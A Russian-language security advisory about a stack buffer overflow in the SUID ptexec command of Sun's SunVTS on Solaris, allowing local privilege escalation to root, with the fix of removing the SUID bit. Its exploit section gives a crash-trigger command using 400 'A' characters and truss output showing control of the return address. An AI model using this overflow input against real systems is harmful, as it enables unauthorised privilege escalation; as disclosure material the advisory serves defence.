Переполнение буфера в Solaris PTExec

Дата публикации:
24.06.2001
Дата изменения:
17.10.2006
Всего просмотров:
1092
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

SunVTS – тестовая платформа, разработанная SUN Microsystems. Она используется для проверки различных OEM SUN hardware на совместимость, а также может быть использована для stress испытания компонентов.

Найдено переполнение буфера в команде ptexec, что позволяет локальному пользователю переписать память стека, включая адрес возвращения (return address), что в конечном итоге может привести к получению прав администратора на локальной машине.

Для устранения удалите бит SUID из ptexec.



Эксплоит:

# > .sunvts_sec_gss

# /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`

Segmentation Fault (core dumped)



# truss /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`



execve("/opt/SUNWvts/bin/ptexec", 0xFFBEFA44, 0xFFBEFA54) argc = 3

stat("/opt/SUNWvts/bin/ptexec", 0xFFBEF780) = 0

open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT

open("/usr/lib/librpcsvc.so.1", O_RDONLY) = 3

fstat(3, 0xFFBEF518) = 0

mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF3A0000



[.....]



sigprocmask(SIG_SETMASK, 0xFF23F010, 0x00000000) = 0

sigaction(SIGSEGV, 0xFFBEE388, 0x00000000) = 0

sigprocmask(SIG_SETMASK, 0xFF24ADE0, 0x00000000) = 0

setcontext(0xFFBEE248)

Incurred fault #6, FLTBOUNDS %pc = 0xFF139FF0

siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141

Received signal #11, SIGSEGV [default]

siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141

*** process killed ***
 


или введите имя

CAPTCHA